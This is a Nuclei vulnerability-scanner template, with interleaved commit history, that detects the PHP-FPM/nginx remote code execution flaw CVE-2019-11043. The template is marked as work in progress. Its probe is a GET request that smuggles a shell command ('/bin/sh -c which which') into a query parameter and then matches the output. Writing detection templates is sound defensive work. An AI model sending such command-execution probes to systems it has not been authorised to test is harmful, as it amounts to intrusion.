nuclei-templates/cves/CVE-2019-11043.yaml

id: cve-2019-11043

info:
  name: PHP-FPM & nginx RCE
  author: geeknik
  severity: high
  description: Certain versions of PHP 7 running on NGINX with php-fpm enabled can be vulnerable to remote code execution.
  reference: https://github.com/neex/phuip-fpizdam
  # This tempalte needs to reworked, WIP.

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?a=/bin/sh+-c+'which+which'&"

    matchers:
      - type: word
        words:
          - "/bin/which"
        part: body
Normalized id fields to match schema regex 2020-09-15 19:25:55 +00:00			`id: cve-2019-11043`
Create CVE-2019-11043.yaml PHP-FPM & nginx RCE (CVE-2019-11043) 2020-09-04 22:28:41 +00:00
			`info:`
			`name: PHP-FPM & nginx RCE`
			`author: geeknik`
			`severity: high`
Update CVE-2019-11043.yaml 2020-11-29 12:08:24 +00:00			`description: Certain versions of PHP 7 running on NGINX with php-fpm enabled can be vulnerable to remote code execution.`
			`reference: https://github.com/neex/phuip-fpizdam`
			`# This tempalte needs to reworked, WIP.`
Update CVE-2019-11043.yaml 2020-09-04 22:30:54 +00:00
Create CVE-2019-11043.yaml PHP-FPM & nginx RCE (CVE-2019-11043) 2020-09-04 22:28:41 +00:00			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/?a=/bin/sh+-c+'which+which'&"`

			`matchers:`
			`- type: word`
			`words:`
			`- "/bin/which"`
			`part: body`